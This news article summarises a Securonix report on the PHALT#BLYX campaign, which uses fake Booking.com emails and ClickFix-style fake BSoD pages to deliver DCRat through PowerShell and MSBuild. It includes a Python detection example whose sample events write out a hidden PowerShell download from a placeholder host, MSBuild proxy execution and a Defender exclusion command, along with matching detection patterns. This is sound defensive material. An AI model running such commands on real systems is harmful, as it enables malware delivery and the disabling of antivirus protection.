Source: Securonix
Cybersecurity researchers have revealed details of a new campaign called PHALT#BLYX that leverages ClickFix-style lures to display fake Blue Screen of Death (BSoD) error fixes in attacks targeting European hospitality businesses.
According to cybersecurity firm Securonix, the end goal of the multi-stage campaign is to deliver a remote access Trojan known as DCRat. This activity was detected in late December 2025.
“During initial access, attackers use the lure of a fake Booking.com reservation cancellation to trick victims into running a malicious PowerShell command that silently fetches and executes remote code,” said researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee.

The attack chain begins with a phishing email impersonating Booking.com that contains a link to a fake website (e.g. “low-house”[.]). The message alerts the recipient to an unexpected reservation cancellation and prompts them to click a link to confirm the cancellation.
The website the victim is redirected to impersonates Booking.com, serves a fake CAPTCHA page, and then directs the victim to a fake BSoD page with “recovery instructions”: open the Windows Run dialog, paste the supplied command, and press Enter. Doing so actually runs a PowerShell command that ultimately deploys DCRat.
Specifically, the infection is a multi-step process that begins with the PowerShell dropper downloading an MSBuild project file (‘v.proj’) from ‘2fa-bns’[.]. This file is executed with ‘MSBuild.exe’ and runs an embedded payload responsible for configuring Microsoft Defender Antivirus exclusions to evade detection, establishing persistence on the host via the Startup folder, and launching the RAT after downloading it from the same location as the MSBuild project.

The malware can also completely disable the security software if it finds itself running with administrator privileges. Without elevated privileges, it enters a loop that triggers a Windows User Account Control (UAC) prompt three times every two seconds, hoping that the victim will grant the necessary permissions out of sheer frustration.
In parallel, the PowerShell code opens a legitimate Booking.com administrative page in the default browser as a distraction mechanism and takes steps to give the victim the impression that the action is legitimate.
DCRat, also known as Dark Crystal RAT, is an off-the-shelf .NET Trojan that can collect sensitive information and extend its functionality through a plugin-based architecture. It can connect to external servers, profile infected systems, and listen for commands from those servers, allowing attackers to record keystrokes, execute arbitrary commands, and deliver additional payloads, such as a cryptocurrency miner.

This campaign is an example of how attackers leverage Living Off-The-Land (LotL) techniques, such as abusing trusted system binaries like ‘MSBuild.exe’, to advance their attacks, establish a deeper foothold, and maintain persistence within compromised hosts.
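The chain described above (a Run-dialog PowerShell one-liner, MSBuild.exe proxy-executing a downloaded .proj, Defender exclusion tampering, and a Startup-folder drop) maps onto a few process- and file-event detections. The following is an added detection example, not code from Securonix or from the report; the Sysmon-style sample events, the host name ‘lure.example’, and every file path in it are constructed placeholders rather than indicators from the campaign.

```python
import re

# Constructed sample events in a Sysmon-like shape (not real telemetry); the lure host
# and file paths are placeholders, not indicators from the report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    # 1. Run-dialog ClickFix: explorer.exe launches a PowerShell one-liner that fetches v.proj
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": r"powershell -w hidden -c iwr hxxp://lure.example/v.proj -OutFile $env:TEMP\v.proj"},
    # 2. MSBuild proxy execution of the downloaded project file
    {"type": "process", "parent": PS, "image": MSB, "cmd": r"MSBuild.exe C:\Users\u\AppData\Local\Temp\v.proj"},
    # 3. Payload inside v.proj adds a Defender exclusion
    {"type": "process", "parent": MSB, "image": PS, "cmd": r"powershell Add-MpPreference -ExclusionPath C:\Users\u\AppData"},
    # 4. RAT dropped into the Startup folder for persistence
    {"type": "file", "image": MSB,
     "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.exe"},
    # 5. Benign developer build: must not fire
    {"type": "process", "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "image": MSB, "cmd": r"MSBuild.exe C:\src\app\app.csproj"},
]

USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public)\\", re.I)
DEFENDER_TAMPER = re.compile(r"(Add|Set)-MpPreference.*-(Exclusion\w+|Disable\w+)", re.I)
DOWNLOAD_CMD = re.compile(r"\b(iwr|Invoke-WebRequest|curl|wget|DownloadString|DownloadFile)\b", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)

def classify(ev):
    """Return the detection tags that fire for a single event."""
    tags, img, parent = [], ev.get("image", "").lower(), ev.get("parent", "").lower()
    cmd = ev.get("cmd", "")
    if ev["type"] == "process":
        if parent.endswith("explorer.exe") and img.endswith("powershell.exe") and DOWNLOAD_CMD.search(cmd):
            tags.append("clickfix_powershell_download")   # Win+R lure pattern
        if img.endswith("msbuild.exe") and USER_WRITABLE.search(cmd):
            tags.append("msbuild_proj_from_user_writable")  # LotL proxy execution
        if DEFENDER_TAMPER.search(cmd):
            tags.append("defender_tamper")
    elif ev["type"] == "file" and STARTUP_DIR.search(ev.get("path", "")):
        tags.append("startup_folder_persistence")
    return tags

def scan(events):
    """Map each firing tag to the indexes of the events that triggered it."""
    hits = {}
    for i, ev in enumerate(events):
        for tag in classify(ev):
            hits.setdefault(tag, []).append(i)
    return hits
```

Each of the four malicious stages trips exactly one rule while the developer build stays silent; in production the MSBuild rule is best scoped further by parent process, since legitimate builds are spawned by devenv.exe or dotnet.exe rather than by PowerShell.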
“The phishing emails specifically contain details of room rates in euros, suggesting that this campaign is actively targeting organizations in Europe,” Securonix said. “The use of Russian within the ‘v.proj’ MSBuild file associates this activity with Russian threat actors using DCRat.”
“Using customized MSBuild project files for proxy execution and actively tampering with Windows Defender exclusions demonstrates a deep understanding of modern endpoint protection mechanisms.”
